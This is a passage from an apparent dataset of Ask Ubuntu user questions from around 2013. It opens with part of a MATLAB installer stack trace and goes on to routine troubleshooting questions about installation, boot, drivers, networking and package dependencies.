internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:804 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) ... 6 more caused by : java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at com.google.inject.internal.providermethod.get ( providermethod.java:101 ) ... 54 more caused by : com.mathworks.instutil.jniexception : java.lang.unsatisfiedlinkerror : ca n't load library : /tmp/mathworks_7417/bin/glnxa64/libinstutil.so at com.mathworks.instutil.nativeutility.loadnativelibrary ( nativeutility.java:39 ) at com.mathworks.instutil.nativeutility. < init > ( nativeutility.java:24 ) at com.mathworks.instutil.displaypropertiesimpl. < init > ( displaypropertiesimpl.java:10 ) at com.mathworks.wizard.wizardmodule.providedisplayproperties ( wizardmodule.java:67 ) ... 59 more caused by : java.lang.unsatisfiedlinkerror : ca n't load library : /tmp/mathworks_7417/bin/glnxa64/libinstutil.so at java.lang.classloader.loadlibrary ( classloader.java:1842 ) at java.lang.runtime.load0 ( runtime.java:795 ) at java.lang.system.load ( system.java:1061 ) at com.mathworks.instutil.nativeutility.loadnativelibrary ( nativeutility.java:37 ) ... 62 more finished i have tried to : 1- re-install java run-time 6 and then 7 . 2- pass the java-path to the install with : -javadir 3- use the force to install on 32 bits as : sh install -glnx86 -v -javadir /usr/lib/jvm/java-6-openjdk-i386/jre but it seems none of them have worked so far . any ideas ? ?
365746	my tar command line is not working it wo n't unzip files	when i try using tar -xvj [ file name ] then hit enter it just hangs and does not unzip file.. i 've tried zipping just a really small text file and it zipped into a .tar.bz file then when i tried to unzip it again it still hangs at the command line -- - yet when i use the app archive manager it unzips the files no problem what gives ?
365750	i deleted /etc/php5 . how do i restore the folder ?	i removed the folder /etc/php5 , after i removed the php5 package . then i tried to install the package , but it said the folder did not exist . i looked in trash folder and could n't find it . how do i restore the folder ?
365757	speed dispatcher-while installin ubuntu 13.10	i want to install ubuntu 13.10 from my bootable pendrive , but after selecting languages when i choose- install ubuntu inside windows 7 , a black screen appeared with some words like this-speed dispatcher detected ... and then the pc restarted . so please someone help me ! ! ( when i checked for errors in the setup , 2 errors were detected )
365758	problems with he speeed on wifi in ubuntu 13.04	i 've recently installed ubuntu 13.04 as unique os in my toshiba portă¨găš , and my surprise is that is impossible to run well with wifi connection . in fact , when i connect directly via ethernet cable , the nominal speed is the maximum of my internet provider , 30 mb/s , but when the connection is via wifi , the maximum speed is lower than 5 mb/s . i 've tried several on-line solutions writing some sentences on the sysctl.conf archive with : gksu gedit /etc/sysctl.conf adding on the lowest part the followings three sentences : net.ipv4.tcp_syncookies = 1 | net.ipv4.tcp_window_scaling = 0 | net.ipv4.tcp_ecn = 0 | after this , i wrote on the terminal : sudo /etc/init.d/networking restart | sudo iwconfig | sudo iwconfig wlan0 rate 54m | i ignore the reason , but the laptop do n't restart correctly after the first sentence and finally i can not reach any positive result even writing the second ant the third one after the forced restart . however , from time to time , if i write on the terminal sudo iwconfig wlan0 rate 54m i keep 30 mb/s , but unfortunately , when the laptop restart , things return as before and it is necessary to try many times the solutions to keep similar results only till the moment that you turn off the laptop ... it 's mean that the problem is not a question of my laptop or my connection card , because from time to time it is possible to keep the normal speed during all the session . it 's a problem of ubuntu and i can not understand how is possible not find a good solution . anyone can help me ? or i must to reinstall windows 7 ...
365759	how to install software to os on other disk ?	have installed 13.10 on a raid1 array following this guide : http : //www.michielovertoom.com/linux/ubuntu-software-raid/ everything went fine , except for the last step where i 'm supposed to install mdadm to the new installation . when i run apt-get ( with the mounted raid array as root-dir ) it seems that it 's not able to locate the ubuntu servers . in fact i 'm not able to reach the internet in any way from the terminal i 've chroot-ed to the new installation on the raid array . since it 's kinda important that mdadm is installed on the raid , how do i resolve this ? have n't found anything useful at google yet .
365760	graphical grub editor for ubuntu 13.10	i wanted to ask what graphical grub editors are there for the latest ubuntu release ( 13.10 ) ? and how to install one ? i searched through the ubuntu software center but i ca n't find anything there . i am a newbie so i need some very clear and basic instructions on how to get one .
365763	whenever i try to install ubuntu 13.10 i get a small window	whenever i try to install ubuntu 13.10 i get a small window with six ? 's , a - sign , and an ok button that does not work . what exactly does that mean ? a the same time the system freezes . i have to restart at this point . i happens all over again .
365764	why i have 2 wifi indicators on the panel ?	look at the screenshots : http : //postimg.org/image/6duf9wfc9/ , http : //postimg.org/image/6zje60aeh/ . someone can help me ? i use ubuntu 13.10 .
365767	recommendation for installing ubuntu ( or variant ) on old hardware like hp omnibook xe3	i want to install ubuntu on an old hp-laptop ( omnibook xe3 - pentium iii generation ) . which ubuntu version is appropriate ? is there some documentation for installation ? where can i download the selected ubuntu version ? thanks , martin
365769	desktop icon rename text color in radiance 13.10	a little change in the radiance theme from 13.04 to 13.10 is bugging me . if you have an icon on the desktop and do right click - > rename and then click on the text , the text changed to black and the background changed to white in 13.04 , but now in 13.10 the background changes to transparent . unfortunately , that is not good if the desktop is a dark colour . i 've been playing with modifying radiance to be a bit more boring ( more blue-gray rather than orange ) but i ca n't find the setting that controls this behaviour in the css files under gtk-3.0 . anyone know what it is ? i 've looked at the gtk+ 3 reference manual but i ca n't find it since i do n't know enough about the names of the individual widgets , et al , to work through it to my specific item .
365770	keep audio in seperate channels	i am recording 2 audio channels with recordmydesktop , my microphone and my speakers . how do i keep the two audio channels split , even after recording ?
365771	unable to install wine / playonlinux - package dependencies can not be resolved	hi am new to ubuntu n need some help . i want to install microsoft office 2013 on my ubuntu 13.10 , for which i 've trying to install playonlinux and wine , both of which are not installing giving me the error `` package dependencies can not be resolved '' . playonlinux does n't give any details at all , but while installing wine , the following error details have been observed.. package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.12ubuntu1 is to be installed depends : libc6 ( > = 2.14 ) but 2.17-93ubuntu4 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu7 ) but 1.4.1-0ubuntu7 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu7 ) but it is not going to be installed i 've searched a lot over net but could n't find any correct solution , so if anyone could please help me out . for your information.. i 've installed wubi 12.10 as dual boot on windows 8 , later upgraded it to ubuntu 13.10 . i could not install the required softwares on any of the versions of ubuntu like 12.10 , 13.04 and finally 13.10 . been trying to upgrade just to see if wine could be installed in any of the version , but just in vain .
365777	instalation of ubuntu 12.04 do n't start , just restart	when i try to install ubuntu from pendrive , i click the option of instaling next to windows 7 and ... my computer just restart . that 's all . it 's like circle , computer starts - > instalation starts - > click on install next to windows 7 - > splash screen of ubuntu - > computer restarts . i tried on ubuntu 13.10 ( which i want to have at the end ) , ubuntu 10.10 and ubuntu 12.04 . nothing works . any ideas ? pendrive 7gb , laptop lenovo y580 .
365780	system running in low graphics after installtion of nvidia driver for 13.10	i installed ubuntu 13.10 on my acer v5-471g with nvidia geforce gt 620 m graphics card . but i encountered flickering , overheating , battery drain and suddedn shutdowns soon after installtion . then i followed step 4 of this link . http : //www.webupd8.org/2013/10/8-things-to-do-after-installing-ubuntu.html this helped solve the hybrid graphics issue on my system and now the fan speed is reduced and system is not overheating . but after following the steps and rebooting , my system ran into low graphics mode . firefox , thunderbird and every other applications are showing in low graphics . how can i get the good graphics back ?
365781	grub rescue halt everything	i have pre-installed window8 laptop and i was trying to installed ubuntu , but when i restart it , following error comes error : file 'boot/grub/i386-pc/normal.mod ' not found . entering in the rescue mode ... ... . grub rescue > whenever i restart same error comes . none of the keys f2 , f12 are working . please let me know how can i fix it . i do n't have window recovery cd .
365782	kernel 3.11.2-12-generic not booting on mac mini ( late 2009 )	after upgrading from ubuntu 13.04 to 13.10 my mac mini ( late 2009 ) wo n't boot the new kernel 3.11 . after selcting the kernel in grub the screen stays blank . there is no output . no messages show up in /var/log/kern.log|syslog|messages so i guess the problem is that the disk ca n't be found or mounted . there are 3 oses installed : osx 10.8 , windows 7 32 bit and ubuntu 13.10 . but that is n't the problem because booting the old 3.8 kernel works fine at the moment . can anyone help ?
365783	can not partition using gparted	here 's a screenshot that might help . basically , i 'm trying to partition this hard drive which currently only has ubuntu 13.04 . however , gparted does not allow me to do anything . when i click on `` unmount '' , it shows this error . and so , i basically ca n't do anything to make a partition . any ideas on how to fix this ?
365784	13.10 desktop install hangs on emachine	wanted to try ubuntu on 2 pentium d dual core emachine computers i have . ( only half a gig i think , might have upgraded , will check . ) found 13.10 needs a dvd burnt which i did n't have so i loaded an old 6.x cd , thought i could upgrade it live from there . able to load/use 6.x overwriting xp just fine . could n't figure how to upgrade it live and machine wo n't boot from usb . then i got dvds , a burner & burnt a 13.10 32 bit desktop , but it hangs on language selection overwriting 6.x . saw other posts advising to remove usb kbd . am using ps/2 kbd and mouse . was able to bring it up on 13.10 in `` trial '' mode and tried to do the install from there and it hung same place . update : the machine had 1.5g in it and it 's a 2.66g processor . i tried lubuntu 13.10 and it hung at the same place . both ubuntu & lubuntu 13.10 would run from the disk . i tried something i thought would n't work ( loading the emachine 's hard drive on a different computer ) and it boots and most of the apps work but the network wo n't connect . i figure that is because the install was built with the wrong nic but it 's not real clear how to fix that and i imagine sound and other on board stuff wo n't work right . oh and i could n't set the resolution so that i could gracefully shutdown the machine without bringing up a command prompt . so i figure it 's probably not worth trying to fix all the stuff that was built incorrectly by installing on a different computer . so there has to be something that is keeping it from loading . guess i 'll try the earlier versions .
365786	ca n't browse network or see them with smbtree	i 'm on a network with windows and linux machines . i know they are there , i can ping them and see them with nmap . however , no matter what settings i seem to try in the smb.conf file i can not view the networked machines with samba . when i do smbtree all i see is my machine . does anybody have any experience with this ? i am running ubuntu 13.04 .
365787	problem with virtualbox when installing ubuntu	i 've followed each of the instructions on how to install ubuntu alongside windows 8 ( 64-bit ) with virtualbox but can not finish the installation because virtualbox stops running always at the end of it . once the installation process has finish , a box is displayed saying that i have to restart so that the changes can be successfully completed . i click on the option `` restart now '' and then the virtual box stops running , the program shuts down and does n't install correctly . i have a samsung np510r5e . i 've read that windows 8 does n't allow other os to be installed so easily , and you have to change the `` ufei settings '' or something like that . however , i should n't have this problem when installing with virtualbox , should i ?
365788	icons missing from system status area on gnome 3.10	i recently installed gnome 3.10 and i noticed that some of the icons do n't show up on my system status menu . i ca n't seem to find any other people having this issue , however if this is a duplicate , please point me in the right direction . interestingly enough , the battery and shutdown icons appear , just no others . not sure what information is important to help you help me , but ask and you shall receive
365790	install errors : `` error processing linux-generic-pae '' plus , why is this editing vista 's config file on sda1 ?	so , i tried to install gimp and pinta image editors this afternoon and i encountered the following error message : installarchives ( ) failed : selecting previously unselected package cli-common # loading packages etc. # errors were encountered while processing : linux-image-3.2.0-55-generic-pae linux-image-3.8.0-32-generic linux-image-generic-lts-raring linux-generic-lts-raring linux-image-generic-pae linux-generic-pae # other messages i thought might be useful dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.55.65 ) ; however : package linux-image-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-lts-raring : linux-generic-lts-raring depends on linux-image-generic-lts-raring ; however : package linux-image-generic-lts-raring is not configured yet . dpkg : error processing linux-generic-lts-raring ( -- configure ) : dependency problems - leaving unconfigured i am relatively competent user , and i 'm slowing learning to navigate linux platforms better , but i have n't been able to figure this problem out . can anyone help me understand what is going on here ? also , i noticed to following snippet of code appeared a few times throughout the error message : p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.8.0-32-generic ... p : writing config for /boot/vmlinuz-3.2.0-55-generic-pae ... p : writing config for windows vista ( loader ) on /dev/sda1 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian-squeeze/extlinux/memtest.bin ' : no such file or directory run-parts : /etc/kernel/postinst.d/zz-extlinux exited with return code 1 what is going on here ? why is it 'writing config for windows vista ' on dev/sda1 ? maybe this is perfectly normal , but when i see it , it worries me that it might be messing up my windows installation . any help on this is much appreciated too .
365793	i cant see youtube videos in ubuntu 12.04	please help i 've just installed ubuntu 12.04 and i 'm new to this operating system ... when i try to see videos on you tube its just show the videos like colour film and ads too.i have a doubt with adobe flash player plug-in but everything is installed correctly . i have this problem in both firefox and chromium browsers .
365794	how to use a projector with lubuntu 13.10	my teacher has an lubuntu 13.10 laptop and he needs to use it on his projector , but there is no signal . does anyone know how to use a projector in lubuntu 13.10 ? thanks
365795	ubuntu 13.10 laptop bluetooth not working properly	i have an issue with bluetooth on ubuntu 13.10 and i have no idea where to start looking . i finally gave a cat /var/log/syslog | grep -i bluetooth and this is what i got ( after a sudo service bluetooth restart ) : oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : terminating oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : endpoint unregistered : sender=:1.58 path=/mediaendpoint/a2dpsink oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : endpoint unregistered : sender=:1.58 path=/mediaendpoint/a2dpsource oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : endpoint unregistered : sender=:1.58 path=/mediaendpoint/hfpag oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : endpoint unregistered : sender=:1.58 path=/mediaendpoint/hfphs oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : stopping sdp server oct 25 19:30:02 razvan-asus bluetoothd [ 764 ] : exit oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : bluetooth daemon 4.101 oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : starting sdp server oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : dis can not start : gatt is disabled oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : failed to init deviceinfo plugin oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : failed to init proximity plugin oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : failed to init time plugin oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : failed to init alert plugin oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : failed to init thermometer plugin oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : failed to init gatt_example plugin oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : bluetooth management interface initialized oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : input-headset driver probe failed for device 7c:61:93 : d4 : a5:8f oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : adapter /org/bluez/3231/hci0 has been enabled oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : unknown command complete for opcode 19 oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : hci0 : get connections ( 0x0015 ) failed : not powered ( 0x0f ) oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/hfpag oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/hfphs oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/a2dpsource oct 25 19:30:02 razvan-asus bluetoothd [ 3231 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/a2dpsink as i never worked with the bluetooth before ( now i have some wireless speakers ) i do n't know how to diagnose the problem . have any of you encountered this ? or is just me ? edit : i should add , the laptop i 'm using is asus u31s edit2 : today i tried searching for a new device ( a mouse ) with the bluetooth `` set up new device '' and it worked . and after pairing i could access the speakers too . prior to this hcitool dev would give nothing now i have : devices : hci0 74:2f:68:69 : bd : ad so ... as far as i can detect , prior to pairing hci0 was down and after the search and successful pairing the device turned on and now the other connections work too ... any ideas ? thank you .
365797	why does n't sudo -s work for 'mysql ' command ?	i generally run sudo mysql database < database.dump and type the password on prompt . in order to automate this , i tried to execute echo 'password ' | sudo -s mysql database < database.dump but it is not recognizing my password . i can sudo -s other commands normally . what might be the problem ?
365798	mouse arrow flash and ghost in ubuntu 13.10	in previous ubuntu 's version 13.04 it worked fine , but now in saucy the mouse pointer has strange effects . using an asus k53sv
365805	ubuntu10.04 does not want to upgrade	i have a death release , and it suggested me to upgrade but there is a problem , it tells me problem of connection when itry to upgrade i heard that you can work with it ( i mean by installing apps ... ) no updates of course but it 's fine , can anyone help me plz
365807	what 's the correct way to share a juju environment ?	i would like to deploy something but i need to be able to have teammates interact with the environment . how do i do this ? are ssh keys involved ?
365816	can not connect my bluetooth speakers . why ?	i can no more connect my bluetooth speakers in 13.10 . it used to work before with 13.04 . bluetooth is on but i ca n't add a new device on the bluetooth manager . is it broken ?
365819	why does my desktop say battery level critical and then hibernate the moment it starts ?	the system will not stay up long enough to logging and see whats going on . anyone got any ideas ?
365821	broken dependencies lib32asound2	i am trying to install the lib32asound2 ( dpkg -i lib32asound2_1.0.25-4ubuntu4_amd64.deb ) package on ubuntu 13.1 but instead i get this message : ( reading database ... 224124 files and directories currently installed . ) preparing to replace lib32asound2 1.0.25-4ubuntu4 ( using lib32asound2_1.0.25-4ubuntu4_amd64.deb ) ... unpacking replacement lib32asound2 ... dpkg : dependency problems prevent configuration of lib32asound2 : lib32asound2 depends on libasound2 ( = 1.0.25-4ubuntu4 ) ; however : version of libasound2 : amd64 on system is 1.0.27.2-1ubuntu6 . dpkg : error processing lib32asound2 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : lib32asound2 could anyone help me out , please ?
365822	ubuntu grub ssd raid0 win8.1	i have a notebook ( asus ux51vz ) with 2x256gb ssd raid0 and efi . - have windows 8 professional pre-installed - i never use , but keep it - i have installed ubuntu 13.04 ( updated to 13.10 ) - i have update to windows 8.1 - problem to restore grub2 in mbr i have try to restore with a guide from wiki or other method founded in internet but with raid0 i have not success . i have try with boot-repair but he said `` grub is still present . please try again. '' . help please , thanks .
365823	how to adjust maximum output volume	the maximum output volume as allowed by the slider control in the menu bar is never loud enough . i have to open the sound settings and boost it past 100 % . this has been the case in 12.04 , 12.10 , and 13.04 . also , if the volume was set past 100 % through sound settings , the use of volume shortcut keys cause the volume to slide back to 100 % . how can i adjust what ubuntu considers 100 % on the output volume ?
365825	strange crashes on zenbook ux31a with ubuntu 13.10	i 'm facing some strange crashes . i initially installed 13.04 on my asus zenbook ux31a and used cinnamon as my preferred desktop environment . after upgrading to final version 13.10 i 'm not able to start any desktop environment correctly from lightdm . first i thought this is due to a kernel bug as mentioned in many bug reports , forums , blogs and so on . but choosing other kernels ( 3.8 , 3.10 ) in grub did n't solve my problem . trying to boot up with unity : after some seconds and a black screen i just get back to lightdm . trying to boot up with gnome flashback : icons are visible ( with default theme ) on a black background desktop without panel and window manager ( no window borders ) . same with cinnamon ( which is a fork of gnome shell ) . i looked into syslog , dmesg , xorg.0.log but ca n't find any helpful information .
365827	secure boot failed - os not valid ubuntu 13.04 windows 8 sony vaio	this is an extension of this question : failing to install ubuntu 13.04 i have wiped the cobwebs out - i.e . i have realized that i was n't following instructions properly . i will continue to try to do that . i have run boot-repair from ubuntu running from cd . i can no longer boot to windows 8 on my sony vaio svf14a15cxb but i am fast losing my concern over this . i am more concerned that i ca n't install ubuntu on the hard disk , so every time i boot up i have to install the wifi and resupply the 16 character wifi password , and i would have to reinstall things like gimp and video codecs every time i boot up . currently , i have an understanding that i need to get back to bios , but i am having a difficult time accomplishing that . there is an `` assist '' key and i am randomly pressing that along with the function shifter key and f1 f2 f3 and ctrl . i did manage to get to bios a couple times and my recollection was that it was the only way i managed to boot from cd . i thought i toggled `` secureboot '' in bios , but now i am not sure . i know i toggled something , and i hope i did n't do the wrong thing by unchecking it in boot-repair . thanks in advance for getting the time of day from any posters .
365836	how to install ubuntu on pattern locked jelly bean tablet ?	i am using aino novo 9 spark tablet . it got locked due to multiple pattern lock attempts by my babies . how do i install ubuntu instead of jelly beans ? this tablet do not have boot loader and i am not able to reach the recovery mode or get into the android system to do anything . when i try to flash with phablet-flash command i am getting an error mentioning 'insufficient permissions for the device ' . looking for your support .
365839	set up filesharing between windows 7 and ubuntu 12.04 lts	i recently purchased a netbook with ubuntu 12.04 lts on it . i am trying to move my files from my windows 7 pc to my netbook but am running into trouble . i have shared my files on my windows pc and have verified it on another windows pc . there is no homegroup on my windows pc and the workgroup is workgroup , just like on my netbook . however i can not see my netbook on the network connections . it is on the network with the rest of the computers but it is not visible , nor are the others visible to it . what do i need to do ? i have read through several tutorials that describe how to use samba ( which seems to be for sharing files from linux to windows , not the reverse ) and several that go through the `` connect to server '' menu but i can not find the connect to server window at all .
365840	compare differences with package default configuration files	so i just did a package upgrade on a server and was asked , as i have been many hundreds of times before the following question : configuration file `/etc/nginx/fastcgi_params' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** fastcgi_params ( y/i/n/o/d/z ) [ default=n ] ? muscle memory took over , i hit return and the default of n ( keep your installed version ) happened . however , i would actually quite like to see the differences between my version and the maintained copy . there may be some improvements , there might not be . it 's hard to know after the fact . now i know i could download a copy of the package , or rummage through my cache and find it there but is there a quicker way ? is there a way , for example , that i could run through the configuration files to be asked the question all over again ? note : i do n't neccessarily want to overwrite my copy - i just want to compare it to a new , fresh copy .
365843	cpu fan running 100 % after waking from suspend	need solution can hear the fan going full for spilt second when closed and going into suspend then becomes stuck at full until reboot . laptop running lugi bios on cr-48 `` first chrome book made '' installed htop do n't know how to output log but only using 6 percent roughly of cpu .
365844	openvpn server fails to auto start	i have been working on migrating our openvpn server from debian 5 to ubuntu 10.04 for a couple weeks now . went through a slew of issues , mostly having to do with being a major newb in this realm . none the less , i now have everything working great except when the server boots . openvpn exits after this line in the syslog : host ovpn-server [ 1230 ] : tcp/udp : socket bind failed on local address [ af_inet ] 192.168.100.5:1194 : can not assign requested address where would i fix this ? i figured someone here will see this and be like , `` you silly newb ... '' help please ! : d if you need more info i will be happy to provide it , just let me know . ~placidsolace
365845	i cant boot with new ( 3.11.6 ) or custom kernel	i was trying compiled my own kernel , after it did n't work i downloaded latest official kernel from http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.11.6-saucy/ for my lubuntu 12.04 3.2.0-55-generic i386 netbook . i installed official kernel with these commands http : //linuxg.net/how-to-install-kernel-3-11-6-on-ubuntu-linux-mint-debian-pear-os-and-elementary-os/ ( i386 ) . i can normally boot with 3.2.0-55-generic ( default kernel ) . so is problem in some configurations or version ( for v3.11.6- '' saucy salamander '' only ? ) ? my boot log : http : //pastebin.com/jlreengn
365846	i keep getting system errors	i constantly keep getting system errors.this poped up the following packages have unmet dependencies : libgl1-mesa-dri : depends : libdrm-nouveau2 ( > = 2.4.34 ) but it is not installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.3-1ubuntu1 is installed the error message was error : brokencount > 0
365850	virtualbox not seeing any usb devices in the usb filters settings	i was following this question but found a problem . use my webcam with ubuntu running in virtualbox i used guvcview to test the camera , it works . i installed the 12.04 virtualbox release from their website and installed the extension pack . but when i click the usb with the green plus sign it says no devices available .
365851	terrible graphics performance with intel graphics on ubuntu 13.10	graphics performance is now terrible ( videos play at ~1 fps , opening dash is extremely slow etc ) on my dell latitude e4300 after upgrading to 13.10 ( 13.04 was fine ) . the graphics adapter is listed as : `` mobile 4 series chipset integrated graphics controller ( version 7 ) '' . any ideas on where to look for the problem ?
365853	what do i do when my screen is blank after i installed nvidia on i think low memory	i installed repository of nvidia graphics as an additional driver and after restarting my laptop my screen after log in is blank . i tried turning it off and logging in again on gnome and even guest but the problem after log in .
365857	slow vnc / desktop sharing performance from windows to 13.10	running 13.10 and trying to connect from a windows box over vnc . the performance is incredibly slow even over a lan connection . is there anything i can do to fix this or at least improve it ?
365859	problem with unity and samba resources	i just installed ubuntu 13.10 and it has problems with shared resources viewed from unity , when i try to open a samba resource like smb : //ip the window closes automatically . help ! !
365861	i ca n't to boot windows 8 after to install ubuntu 13.04	i started windows 8 on grub , but show it me something like that : error image ! i tried to repair the grub with boot-repair , but i could not , i have that report : report boot-repair !
365863	file `siunitx.sty ' not found	i switched to ubuntu from windows today and got lots of problems . here is one of them . i installed texlive and had trouble figuring out hove to add the path to .bashrc file . anyway , i figured it out using this link http : //ubuntuforums.org/archive/index.php/t-1359211.html but still i can not compile my latex code . i get such error : `` file `siunitx.sty ' not found '' however , i think it is only the problem of not properly configured path . i would greatly appreciate if somebody help as i have already spent full half day on this but no success yet . mehdi
365868	how do i open up gnome ?	i 'm new to ubuntu and i just downloaded 13.10 . it shows that i have gnome downloaded or at least i think so cause it has a green check by it and an option to uninstall but how do i open gnome ?
365869	weird sound problems after upgrading to 13.10 ( macbook )	i have been having a very weird problem with my sound lately : 1 ) my sound is extremely disorted with relativly loud noises , tested with several headphones . 2 ) after a while , wiered noises start coming from my speakers 3 ) playing lots of sounds at once causes the the output to become really mushed , e.g . in lmms or games . all points to a : a fault in my sound card , or b : a fault in alsa or pulseaudio , but i do n't know how to find out . i tried alsa-daily , which fixed the problem a bit , but its still a issue
365870	give a programm an unconstrained amount of ram	i am running a linux application , not wine . how can i find out if it has any memory constraints , if any at all ? if it does have memory constraints how can i increase it ? i have 12gb of system ram . the process seems to be capping at 3.4gb of ram . the name of the process is ksp.x86 , it is a game .
365875	using fractions/decimals in bash script ubuntu 12.04	is there a certain syntax to use while using fractions or decimals in a bash script ? i tried using the following script : # ! /bin/bash { n=9 echo `` $ n '' for ( ( i=.5 ; $ i < 10 ; i++ ) ) ; do let `` c= $ i+1 '' echo $ i `` + '' $ c done } this works with i=1 , but it generates a syntax error when i put .5 .
365876	itunes for ubuntu studio	i have finally gotten my old mac hdd sorted out , and now i would like to know if anybody has either : a ) a way to run itunes without wine , as it did not work out well for me the last time i tried it , or b ) any other media player that will sync with an ipod and , more importantly , use the same file system . when my mac died , i started to get into open source . i bought a macbook air , only out of necessity . for almost two years now , i have not once backed up or synced my ipod . i am getting nervous that it may give up on it 's life soon and would like to find a solution . i do n't have enough room on my air , and it would just erase my ipod anyway ... another thing that i am having trouble with is the way itunes arranged the music . now , it is arranged all by artist , then album , the song and i would like to have a media library , but somewhere around 400gb of music is a lot to sift through ( i have attempted in the past ) . thus i am looking for something that will use the same library format . a side note : as i was writing this i started to wonder ; is a hackintosh in order here ? if somebody will give me instructions on how to install macosx for free ( maybe mavericks ? ) in a dual boot with ubuntu , i will be ever grateful . : ) thanks , soundblastdj
365877	copy only folders not files ?	is there a way to copy an entire directory , but only the folders ? i have a corrupt file somewhere in my directory which is causing my hard disks to fail . so instead of copying the corrupt file to another hard disk , i wanted to just copy the folders , because i have scripts that search for hundreds of folders , and i do n't want to have to manually create them all . i did search the cp manual , but could n't see anything ( i may have missed it ) say i have this structure on my failed hdd : dir1 files dir2 files files dir4 dir3 files all i a want is the directory structure , not any files at all . so i 'd end up with on the new hdd : dir1 dir2 dir4 dir3 hoping someone knows some tricks !
365879	is that possible to natively boot ubuntu touch on a pc , especially on a surface pro ?	i know the question has already been asked , but the link for the instructions in the answer is outdated and the proof of concept video does n't match with what i 'm looking for . i 've got a surface pro ( 1st model ) , i 've already ran ubuntu and android on it several times with unetbootin , so the question is : is there a way to natively run ubuntu touch ( by natively i mean by directly booting it , even on a usb key , but no emulation , no virtualization ) on such a device ?
365882	touchpad settings wo n't persist after reboot following upgrade from 13.04 to 13.10	when i turn my touchpad off in gnome or dconf editor it turns back on after reboot . this behaviour only started happening after i upgraded from 13.04 to 13.10 . any ideas ?
365883	hdmi ac-3 audio passthrough broke after upgrading from 11.10 to 12.04.3	i just updated my mythbuntu 11.10 to 12.04.3 . now , when i try to play 5.1 content ( ripped dvd ) , my tv ( and receiver ) plays a `` chattering '' sound . i check my receiver and the digital dolby light is n't on -- it 's in pcm mode . so , either the audio is getting sent as ac-3 , but the tv and receiver think it 's pcm or the ac-3 audio got converted to multichannel pcm and they ca n't handle it . my setup : hdmi cable from htpc to tv . tv has an s/pdif output to my receiver . i know tv sends ac-3 audio out correctly because i see digital dolby light come on when i view a digital tv channel and pcm come on when i view an old analog channel . i can connect s/pdif from my htpc to my receiver and the digital dolby light comes on and it can decode the audio just fine . it 's just not sending it right over hdmi . now for some hints to the issue : i noticed in mythtv audio setup when i select alsa : hdmi ... . the description only lists 2 channel pcm audio capability . speaker-test -dhdmi : pch -c6 errors about a bad channel count ( only -c2 works ) . finally , i tried vlc and it does the same chattering sound . these all make me think this is n't a mythtv issue , it 's something lower than that . i tried to use mplayer to play a downloaded .ac3 file and got the same sound : mplayer -ao alsa : device=hw=0.3 -afm hwac3 lynntest.ac3 i do n't know how to read /proc/asound/card0/eld # 3.0 , but these lines look interesting 